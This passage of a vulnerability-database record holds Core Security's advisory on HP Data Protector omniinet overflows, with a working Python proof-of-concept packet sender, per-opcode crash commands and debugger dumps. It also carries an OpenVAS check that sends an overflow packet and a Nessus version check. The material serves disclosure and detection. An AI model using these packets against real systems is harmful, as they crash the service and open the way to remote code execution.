Protector is vulnerable to these issues.\nHP has provided the following procedure to mitigate these vulnerabilities:\n\n 1. Upgrade to Data Protector A.06.20 or subsequent.\n 2. Enable encrypted control communication services on cell server and\nall clients in cell.\n\n The upgrade is available for download from\nhttp://hp.com/go/dataprotector then under 'Product Information' click on\n'Trials and Demos'.\n\n\n7. *Credits*\n\nThese vulnerabilities were discovered by Oren Isacson from Core Security\nTechnologies. Publication was coordinated by Carlos Sarraute.\n\n\n8. *Technical Description / Proof of Concept Code*\n\nThe following python script can be used to reproduce the different bugs.\n\n/-----\nimport struct, socket, sys\n\ntarget = sys.argv[1]\nopcode = sys.argv[2]\nstring_lenght = int(sys.argv[3])\nargs_number = int(sys.argv[4])\nlong_argument = int(sys.argv[5])\n\ndef to_wc(x):\n return ''.join([\"%s\\x00\" % c for c in x] )\n\nargs = [to_wc('a')] * args_number\nargs[5] = to_wc(opcode)\nargs[long_argument] = 'a' * string_lenght\npacket = [\"\\xff\\xfe\\x32\\x00\\x00\\x00\"]\n\nfor s in args:\n packet.append(\"\\x20\\x00\" + s + \"\\x00\\x00\")\n\npacket = ''.join(packet)\npacket = struct.pack(\">L\", len(packet)) + packet\n\nsock = socket.socket(socket.AF_INET,socket.SOCK_STREAM)\nsock.connect((target, 5555))\nsock.send(packet)\n\n- -----/\n\n\nIn the following sections, we give the command line details to reproduce\neach bug, and a brief description of the effect produced.\n\n\n8.1. *Vulnerability 1. Opcodes 20 y 28.*\n\n[CVE-2011-1865] This vulnerability can be reproduced with any of the\nfollowing commands:\n \"poc.py 127.0.0.1 20 10000 30 13\" or \"poc.py 127.0.0.1 28 10000 30 6\"\n This causes a stack overflow.\n\n/-----\n007ce194 00426c52 007d0000 00810b48 007ce266 omniinet+0x26bf3\n007ce1a8 00412a35 007ce22c 004aa900 0080edb0 omniinet+0x26c52\n007cea3c 61616161 61616161 61616161 61616161 omniinet+0x12a35\n61616161 00000000 00000000 00000000 00000000 0x61616161\n\n- -----/\n\n\n\n8.2. *Vulnerability 2. Opcode 11.*\n\n[CVE-2011-1865] This vulnerability is reproduced with the following command:\n \"poc.py 127.0.0.1 11 10000 30 17\"\n A stack overflow is produced within the function swprintf, called from\nposition 0x00411A72.\n\n\n8.3. *Vulnerability 3. Opcode 35.*\n\n[CVE-2011-1865] This vulnerability can be reproduced with any of the\nfollowing commands:\n \"poc.py 127.0.0.1 35 10000 30 6\" or \"poc.py 127.0.0.1 35 10000 30 7\"\n A stack overflow is produced within the function swprintf, called from\nposition 0041367F.\n\n\n8.4. *Vulnerability 4. Opcode 42.*\n\n[CVE-2011-1865] This vulnerability is reproduced with the following command:\n \"poc.py 127.0.0.1 42 10000 30 9\"\n A stack overflow is produced by calling the function swprintf from\nposition 0x0040A9BA.\n\n\n8.5. *Vulnerability 5. Opcode 46.*\n\n[CVE-2011-1865] This vulnerability is reproduced with the following command:\n \"poc.py 127.0.0.1 46 10000 30 17\"\n A stack overflow is produced by calling the function swprintf from\nposition 0x0040A708.\n\n\n8.6. *Vulnerability 6. Opcode 27.*\n\n[CVE-2011-1865] This vulnerability is reproduced with the following command:\n \"poc.py 127.0.0.1 27 10000 30 3\"\n A stack overflow is produced by calling the function swprintf from\nposition 0x0040AD53.\n\n\n8.7. *Vulnerabilidad 7. Opcode 17.*\n\n[CVE-2011-1865] This vulnerability is reproduced with the following command:\n \"poc.py 127.0.0.1 17 10000 30 6\"\n A stack overflow is produced by calling the function swprintf from\nposition 0x0040FC05.\n\n\n8.8. *Vulnerability 8. Opcode 11.*\n\n[CVE-2011-1514] This vulnerability is reproduced with the following command:\n \"poc.py 127.0.0.1 11 1 7 6\"\n This causes a null pointer dereference.\n\n/-----\neax=00000014 ebx=00156490 ecx=007cdd34 edx=007eecf0 esi=00156490\nedi=00000000\neip=00407ed0 esp=007cdd34 ebp=007cdd8c iopl=0 nv up ei pl nz ac\npe nc\ncs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000\nefl=00010212\nomniinet+0x7ed0:\n00407ed0 8b10 mov edx,[eax]\nds:0023:00000014=????????\n\n\n007cdd8c 0041143e 00000000 00000000 00156490 omniinet+0x7ed0\n007cea3c 0040892b 00000001 0046b9f0 00000000 omniinet+0x1143e\n007cf4b8 00408f02 00000000 00000000 00156490 omniinet+0x892b\n007cf518 0040a42c 00000000 7ad5f7f9 00000000 omniinet+0x8f02\n007cffa0 77df352b 00000001 00156498 0012e7f8 omniinet+0xa42c\n007cffb4 7c80b713 00156490 00000000 0012e7f8\nADVAPI32!CryptVerifySignatureW+0x29\n007cffec 00000000 77df3519 00156490 00000000\nkernel32!GetModuleFileNameA+0x1b4\n\n- -----/\n\n\n8.9. *Vulnerability 9. Opcode 20.*\n\n[CVE-2011-1515] This vulnerability is reproduced with the following command:\n \"poc.py 127.0.0.1 20 1 7 6\"\n The process terminates without generating an exception, resulting in a\ndenial of service condition.\n\n\n9. *Report Timeline*\n\n. 2011-06-02:\nCore Security Technologies notifies HP Security Alert team of the\nvulnerabilities. Publication date is temporarily set to July 5th, 2011.\n\n. 2011-06-06:\nVendor acknowledges receipt.\n\n. 2011-06-06:\nCore sends technical details to the vendor.\n\n. 2011-06-06:\nVendor confirms that a new case was assigned within HP Software Security\nResponse Team (SSRT).\n\n. 2011-06-16:\nCore requests an update on this issue, in particular Core asks the\nvendor for a technical analysis of the bugs, a list of affected products\nand versions, and the vendor's plan for providing a fix (no reply\nreceived).\n\n. 2011-06-23:\nCore requests once more an update.\n\n. 2011-06-28:\nVendor communicates that a security bulletin will be issued on the same\nday (June 28). The vendor confirms the vulnerabilities, and recommends\nas mitigation to enable encrypted communications in the cell server and\nclient.\n\n. 2011-06-28:\nCore requests a link to the vendor's bulletin, and asks whether CVE ids\nhave been assigned.\n\n. 2011-06-28:\nVendor provides a link to the bulletin and CVE names for the\nvulnerabilities.\n\n. 2011-06-29:\nAdvisory CORE-2011-0514 is published.\n\n\n10. *References*\n\n[1] HP Data Protector http://hp.com/go/dataprotector\n[2] HPSBMU02686 SSRT100541 rev.2 - HP OpenView Storage Data Protector,\nRemote Execution of Arbitrary Code\nhttp://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c02872182\n\n\n11. *About CoreLabs*\n\nCoreLabs, the research center of Core Security Technologies, is charged\nwith anticipating the future needs and requirements for information\nsecurity technologies. We conduct our research in several important\nareas of computer security including system vulnerabilities, cyber\nattack planning and simulation, source code auditing, and cryptography.\nOur results include problem formalization, identification of\nvulnerabilities, novel solutions and prototypes for new technologies.\nCoreLabs regularly publishes security advisories, technical papers,\nproject information and shared software tools for public use at:\nhttp://corelabs.coresecurity.com.\n\n\n12. *About Core Security Technologies*\n\nCore Security Technologies enables organizations to get ahead of threats\nwith security test and measurement solutions that continuously identify\nand demonstrate real-world exposures to their most critical assets. Our\ncustomers can gain real visibility into their security standing, real\nvalidation of their security controls, and real metrics to more\neffectively secure their organizations.\n\nCore Security's software solutions build on over a decade of trusted\nresearch and leading-edge threat expertise from the company's Security\nConsulting Services, CoreLabs and Engineering groups. Core Security\nTechnologies can be reached at +1 (617) 399-6980 or on the Web at:\nhttp://www.coresecurity.com.\n\n\n13. *Disclaimer*\n\nThe contents of this advisory are copyright (c) 2011 Core Security\nTechnologies and (c) 2011 CoreLabs, and are licensed under a Creative\nCommons Attribution Non-Commercial Share-Alike 3.0 (United States)\nLicense: http://creativecommons.org/licenses/by-nc-sa/3.0/us/\n\n\n14. *PGP/GPG Keys*\n\nThis advisory has been signed with the GPG key of Core Security\nTechnologies advisories team, which is available for download at\nhttp://www.coresecurity.com/files/attachments/core_security_advisories.asc.\n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1.4.9 (MingW32)\n\niEUEARECAAYFAk4LmqsACgkQyNibggitWa02bgCYyTgE3BmdxGGAOY4dNZqmekvo\nCwCfTapBtDaQT/LBrrVC7K4l8G5hnEo=\n=ozGY\n-----END PGP SIGNATURE-----", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "openvas": [{"lastseen": "2019-05-29T18:39:36", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-1515", "CVE-2011-1514", "CVE-2011-1865", "CVE-2011-1866"], "description": "This host is installed with HP (OpenView Storage) Data Protector and is prone to\n multiple remote code execution vulnerabilities.", "modified": "2018-09-17T00:00:00", "published": "2011-07-01T00:00:00", "id": "OPENVAS:1361412562310902454", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310902454", "type": "openvas", "title": "HP (OpenView Storage) Data Protector Multiple Remote Code Execution Vulnerabilities", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: secpod_hp_data_protector_mult_code_exec_vuln.nasl 11421 2018-09-17 06:58:23Z cfischer $\n#\n# HP (OpenView Storage) Data Protector Multiple Remote Code Execution Vulnerabilities\n#\n# Authors:\n# Antu Sanadi <santu@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2011 SecPod, http://www.secpod.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:hp:data_protector\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.902454\");\n script_version(\"$Revision: 11421 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-09-17 08:58:23 +0200 (Mon, 17 Sep 2018) $\");\n script_tag(name:\"creation_date\", value:\"2011-07-01 16:09:45 +0200 (Fri, 01 Jul 2011)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_cve_id(\"CVE-2011-1865\", \"CVE-2011-1514\", \"CVE-2011-1515\", \"CVE-2011-1866\");\n script_bugtraq_id(48486);\n script_name(\"HP (OpenView Storage) Data Protector Multiple Remote Code Execution Vulnerabilities\");\n script_category(ACT_DENIAL);\n script_copyright(\"Copyright (c) 2011 SecPod\");\n script_family(\"General\");\n script_dependencies(\"hp_data_protector_installed.nasl\");\n script_require_ports(\"Services/hp_dataprotector\", 5555);\n script_mandatory_keys(\"hp_data_protector/installed\");\n\n script_xref(name:\"URL\", value:\"http://www.exploit-db.com/exploits/17458/\");\n script_xref(name:\"URL\", value:\"http://seclists.org/fulldisclosure/2011/Jun/552\");\n script_xref(name:\"URL\", value:\"http://seclists.org/fulldisclosure/2011/Jun/551\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote attackers to execute\n arbitrary code and lead to denial of service conditions.\");\n\n script_tag(name:\"affected\", value:\"HP (OpenView Storage) Data Protector 6.20 and prior.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws are due to error in 'data protector inet' service,\n command. which allows remote remote attackers to execute arbitrary code.\");\n\n script_tag(name:\"summary\", value:\"This host is installed with HP (OpenView Storage) Data Protector and is prone to\n multiple remote code execution vulnerabilities.\");\n\n script_tag(name:\"solution\", value:\"No known solution was made available for at least one year since the disclosure\n of this vulnerability. Likely none will be provided anymore. General solution options are to upgrade to a newer\n release, disable respective features, remove the product or replace the product by another one.\");\n\n script_tag(name:\"solution_type\", value:\"WillNotFix\");\n script_tag(name:\"qod_type\", value:\"remote_vul\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\n\nif( ! port = get_app_port( cpe:CPE ) ) exit( 0 );\nget_app_location( cpe:CPE, port:port, nofork:TRUE ); # To have a reference to the Detection NVT within the GSA\n\nsoc = open_sock_tcp( port );\nif( ! soc ) exit( 0 );\n\nheaddata = raw_string( 0x00, 0x00, 0x27, 0xca, 0xff, 0xfe, 0x32,\n 0x00, 0x00, 0x00, 0x20, 0x00, 0x61, 0x00, 0x00,\n 0x00, 0x20, 0x00, 0x61, 0x00, 0x00, 0x00, 0x20,\n 0x00, 0x61, 0x00, 0x00, 0x00, 0x20, 0x00, 0x61,\n 0x00, 0x00, 0x00, 0x20, 0x00, 0x61, 0x00, 0x00,\n 0x00, 0x20, 0x00, 0x32, 0x00, 0x38, 0x00, 0x00,\n 0x00, 0x20, 0x00 );\n\nmiddata = crap( data:raw_string( 0x61 ), length:10001 );\n\nlastdata = raw_string( 0x00, 0x00, 0x20, 0x00, 0x61, 0x00, 0x00,\n 0x00, 0x20, 0x00, 0x61, 0x00, 0x00, 0x00, 0x20,\n 0x00, 0x61, 0x00, 0x00, 0x00, 0x20, 0x00, 0x61,\n 0x00, 0x00, 0x00, 0x20, 0x00, 0x61, 0x00, 0x00,\n 0x00, 0x20, 0x00, 0x61, 0x00, 0x00, 0x00, 0x20,\n 0x00, 0x61, 0x00, 0x00, 0x00, 0x20, 0x00, 0x61,\n 0x00, 0x00, 0x00, 0x20, 0x00, 0x61, 0x00, 0x00,\n 0x00, 0x20, 0x00, 0x61, 0x00, 0x00, 0x00, 0x20,\n 0x00, 0x61, 0x00, 0x00, 0x00, 0x20, 0x00, 0x61,\n 0x00, 0x00, 0x00, 0x20, 0x00, 0x61, 0x00, 0x00,\n 0x00, 0x20, 0x00, 0x61, 0x00, 0x00, 0x00, 0x20,\n 0x00, 0x61, 0x00, 0x00, 0x00, 0x20, 0x00, 0x61,\n 0x00, 0x00, 0x00, 0x20, 0x00, 0x61, 0x00, 0x00,\n 0x00, 0x20, 0x00, 0x61, 0x00, 0x00, 0x00, 0x20,\n 0x00, 0x61, 0x00, 0x00, 0x00, 0x20, 0x00, 0x61,\n 0x00, 0x00, 0x00, 0x20, 0x00, 0x61, 0x00, 0x00,\n 0x00, 0x20, 0x00, 0x61, 0x00, 0x00, 0x00, 0x20,\n 0x00, 0x61, 0x00, 0x00, 0x00 );\n\nreq = headdata + middata + lastdata;\n\nsend( socket:soc, data:req );\n\nclose( soc );\n\nsleep( 5 );\n\nsoc = open_sock_tcp( port );\nif( ! soc ) {\n security_message( port:port );\n exit( 0 );\n} else {\n response = recv( socket:soc, length:4096, timeout:20 );\n if( \"HP Data Protector\" >!< response && \"HPE Data Protector\" >!< response && \"HP OpenView Storage Data Protector\" >!< response ) {\n security_message( port:port );\n exit( 0 );\n }\n}\n\nclose( soc );\n\nexit( 99 );", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "nessus": [{"lastseen": "2021-01-01T03:15:31", "description": "The version of HP Data Protector installed on the remote Windows host\nis affected by one or more of the following vulnerabilities :\n\n - Multiple denial of service vulnerabilities exist in the\n 'data protect inet' service. (CVE-2011-1514, \n CVE-2011-1515)\n\n - A buffer overflow vulnerability exists in the 'data\n protector inet' service that can be exploited via \n EXEC_CMD. (CVE-2011-1864)\n\n - A buffer overflow vulnerability exists in the inet\n service that could result in code execution via a \n request containing crafted parameters. (CVE-2011-1865)", "edition": 26, "published": "2011-07-11T00:00:00", "title": "HP Data Protector <= A.06.20 Multiple Vulnerabilities (credentialed check)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-1515", "CVE-2011-1514", "CVE-2011-1865", "CVE-2011-1864", "CVE-2011-1866"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/a:hp:storage_data_protector"], "id": "HP_DATA_PROTECTOR_0620_MULTIPLE_VULNS_CREDS.NASL", "href": "https://www.tenable.com/plugins/nessus/55551", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(55551);\n script_version(\"1.19\");\n script_cvs_date(\"Date: 2018/11/15 20:50:27\");\n\n script_cve_id(\n \"CVE-2011-1514\",\n \"CVE-2011-1515\",\n \"CVE-2011-1865\", \n \"CVE-2011-1866\"\n );\n script_bugtraq_id(48486, 48488);\n script_xref(name:\"Secunia\", value:\"45100\");\n\n script_name(english:\"HP Data Protector <= A.06.20 Multiple Vulnerabilities (credentialed check)\");\n script_summary(english:\"Checks if encrypted control communication services is enabled.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host has an application that is affected by\nmultiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of HP Data Protector installed on the remote Windows host\nis affected by one or more of the following vulnerabilities :\n\n - Multiple denial of service vulnerabilities exist in the\n 'data protect inet' service. (CVE-2011-1514, \n CVE-2011-1515)\n\n - A buffer overflow vulnerability exists in the 'data\n protector inet' service that can be exploited via \n EXEC_CMD. (CVE-2011-1864)\n\n - A buffer overflow vulnerability exists in the inet\n service that could result in code execution via a \n request containing crafted parameters. (CVE-2011-1865)\");\n\n # http://www.coresecurity.com/content/HP-Data-Protector-EXECCMD-Vulnerability\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?6d655681\");\n # http://www.coresecurity.com/content/HP-Data-Protector-multiple-vulnerabilities\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?79bee660\");\n # http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c02872182\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?0e38ce76\");\n script_set_attribute(attribute:\"solution\", value:\n\"1. Upgrade to Data Protector A.06.20 or later and\n\n2. Enable encrypted control communication services on cell server and\n all clients in cell.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploithub_sku\", value:\"EH-12-076\");\n script_set_attribute(attribute:\"exploit_framework_exploithub\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'HP OmniInet.exe Opcode 20 Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\nscript_set_attribute(attribute:\"vuln_publication_date\", value:\"2011/06/29\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/04/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/07/11\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:hp:storage_data_protector\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2011-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"hp_data_protector_installed_local.nasl\");\n script_require_keys(\"SMB/HP Data Protector/Version\");\n\n exit(0);\n}\n\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\nversion = get_kb_item_or_exit('SMB/HP Data Protector/Version');\nencrypted_comm = get_kb_item_or_exit('SMB/HP Data Protector/Encrypted');\nverui = get_kb_item('SMB/HP Data Protector/VersionUI');\ntype = get_kb_item('SMB/HP Data Protector/Type');\npath = get_kb_item('SMB/HP Data Protector/Path');\n\nif (encrypted_comm) encrypted_comm = 'True';\nelse encrypted_comm = 'False';\n\nver = split(version, sep:'.', keep:FALSE);\nfor (i=0; i<max_index(ver); i++)\n ver[i] = int(ver[i]);\n\nif (\n ver[0] < 6 || \n (ver[0] == 6 && ver[1] < 20) ||\n (ver[0] == 6 && ver[1] == 20 && encrypted_comm == 'False')\n)\n{\n if (report_verbosity > 0)\n {\n report = \n '\\n Path : ' + path + \n '\\n Install type : ' + type +\n '\\n Encryption : ' + encrypted_comm + \n '\\n Installed version : ' + verui +\n '\\n Fixed version : A.06.20 with encrypted control communications services \\n';\n security_hole(port:get_kb_item('SMB/transport'), extra:report);\n }\n else security_hole(get_kb_item('SMB/transport'));\n exit(0);\n}\nelse exit(0, 'The HP Data Protector '+verui+' install is not affected.');\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}]}
